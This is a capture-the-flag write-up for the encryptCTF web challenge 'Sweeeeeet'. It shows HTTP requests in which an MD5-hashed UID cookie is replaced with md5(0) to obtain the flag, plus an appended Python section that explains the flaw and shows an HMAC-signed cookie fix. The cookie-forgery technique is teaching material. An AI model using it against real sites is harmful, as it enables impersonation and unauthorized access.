Tags: cookie web
# ▼▼▼Sweeeeeet(Web:50、174/696=25%)▼▼▼
This writeup is written by [**@kazkiti_ctf**](https://twitter.com/kazkiti_ctf)
```
Do you like sweets?
http://104.154.106.182:8080
author: codacker
```
---
## 【Check】
```
GET / HTTP/1.1
Host: 104.154.106.182:8080
```
↓
```
HTTP/1.1 200 OK
Date: Thu, 04 Apr 2019 12:30:21 GMT
Server: Apache/2.4.25 (Debian)
X-Powered-By: PHP/7.3.3
Set-Cookie: UID=f899139df5e1059396431415e770c6dd; expires=Sat, 06-Apr-2019 12:30:21 GMT; Max-Age=172800
Vary: Accept-Encoding
Content-Length: 353
Connection: close
Content-Type: text/html; charset=UTF-8

<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta http-equiv="X-UA-Compatible" content="ie=edge">
<title>Hidden</title>
</head>
<body>
<h2>Hey You, yes you!
are you looking for a flag, well it's not here bruh!
Try someplace else<h2>
</body>
</html>
```
---
Only this part of the response looks suspicious. The value seems to be an MD5 hash:
`Set-Cookie: UID=f899139df5e1059396431415e770c6dd`
↓ Google search
md5(100)=f899139df5e1059396431415e770c6dd
---
## 【exploit】
Try sending the MD5 of each number from `0` to `101` as the `UID` cookie
↓
Only the following value produced a different response
md5(0)=`cfcd208495d565ef66e7dff9f98764da`
↓
```
GET / HTTP/1.1
Host: 104.154.106.182:8080
Cookie: UID=cfcd208495d565ef66e7dff9f98764da
```
↓
`Set-Cookie: FLAG=encryptCTF%7B4lwa4y5_Ch3ck_7h3_c00ki3s%7D%0A`
↓
`encryptCTF{4lwa4y5_Ch3ck_7h3_c00ki3s}`
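Why this cookie fails, and one way to fix it, as an added example that is not part of the original writeup or the challenge's code: an unkeyed MD5 of a small integer can be reversed offline by enumeration, while an HMAC-signed value cannot be forged without the server key. The function names, `SERVER_KEY` and the `id.tag` cookie layout are assumptions made for illustration.

```python
import hashlib
import hmac
import secrets

def recover_small_int(cookie_hex, limit=100_000):
    """Audit check: return n if cookie_hex == md5(str(n)) for 0 <= n < limit."""
    target = cookie_hex.strip().lower()
    for n in range(limit):
        if hashlib.md5(str(n).encode()).hexdigest() == target:
            return n
    return None

# Assumption: a per-deployment secret kept server-side (hypothetical name).
SERVER_KEY = secrets.token_bytes(32)

def _tag(uid_text, key):
    return hmac.new(key, uid_text.encode(), hashlib.sha256).hexdigest()

def issue_uid_cookie(uid, key=SERVER_KEY):
    """Hardened form: the id travels with a keyed MAC the client cannot compute."""
    uid_text = str(int(uid))
    return f"{uid_text}.{_tag(uid_text, key)}"

def verify_uid_cookie(cookie, key=SERVER_KEY):
    """Return the uid only if the MAC matches; otherwise None."""
    uid_text, sep, tag = cookie.partition(".")
    if not sep or not (uid_text.isascii() and uid_text.isdigit()):
        return None
    expected = _tag(uid_text, key)
    # Constant-time comparison on bytes avoids a timing side channel.
    if hmac.compare_digest(tag.encode(), expected.encode()):
        return int(uid_text)
    return None

if __name__ == "__main__":
    weak = "f899139df5e1059396431415e770c6dd"  # UID value from the response above
    print("weak cookie decodes to:", recover_small_int(weak))
    good = issue_uid_cookie(100)
    print("signed cookie verifies as:", verify_uid_cookie(good))
    forged = "0." + good.split(".", 1)[1]  # swap the id, reuse the old tag
    print("forged cookie verifies as:", verify_uid_cookie(forged))
```

A random session identifier that the server maps to the user ID avoids exposing the ID at all; the signed form is shown here because it keeps the same stateless cookie design.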